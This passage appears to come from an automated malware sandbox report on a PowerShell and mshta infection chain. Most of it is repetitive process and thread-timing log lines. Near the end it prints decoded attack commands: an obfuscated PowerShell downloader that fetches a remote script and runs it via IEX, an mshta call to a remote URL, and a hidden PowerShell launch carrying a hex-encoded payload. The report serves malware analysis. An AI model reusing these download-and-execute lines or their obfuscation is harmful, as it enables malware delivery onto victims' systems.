      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1387
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1695
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1510
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6986
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 918
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 454
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2914
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6769
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qwzwa2hv.dllJump to dropped file
      Source: C:\Windows\System32\svchost.exe TID: 7160Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep count: 216 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep count: 68 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep count: 1387 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep count: 1695 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep count: 1510 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep count: 6986 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984Thread sleep count: 918 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152Thread sleep count: 454 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152Thread sleep count: 2914 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -10145709240540247s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152Thread sleep count: 6769 > 30
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded ls panyo*;Set-Variable Emi 'public class gMWIpEHNVi{public static string DvgyiJxuTt(string url){return (new System.Net.WebClient()).DownloadString(url);}}';Set-Variable BF 'https://nopaste.net/fffffffffffffffff';&(GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name).(((GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name).PsObject.Methods|Where-Object{$_.Name-clike'G*d'}).Name).Invoke((GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name).(((GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*om*e'}).Name).Invoke('*-Ty*e',1,1),[Management.Automation.CommandTypes]::Cmdlet)-La CSharp (LS Variable:/Emi).Value;([gMWIpEHNVi]::DvgyiJxuTt((GV BF -ValueOnl)))|&(GI Alias:IE*)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded ls panyo*;Set-Variable Emi 'public class gMWIpEHNVi{public static string DvgyiJxuTt(string url){return (new System.Net.WebClient()).DownloadString(url);}}';Set-Variable BF 'https://nopaste.net/fffffffffffffffff';&(GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name).(((GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name).PsObject.Methods|Where-Object{$_.Name-clike'G*d'}).Name).Invoke((GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name).(((GV E*tex*).Value.(((GV E*tex*).Value|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*om*e'}).Name).Invoke('*-Ty*e',1,1),[Management.Automation.CommandTypes]::Cmdlet)-La CSharp (LS Variable:/Emi).Value;([gMWIpEHNVi]::DvgyiJxuTt((GV BF -ValueOnl)))|&(GI Alias:IE*)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E
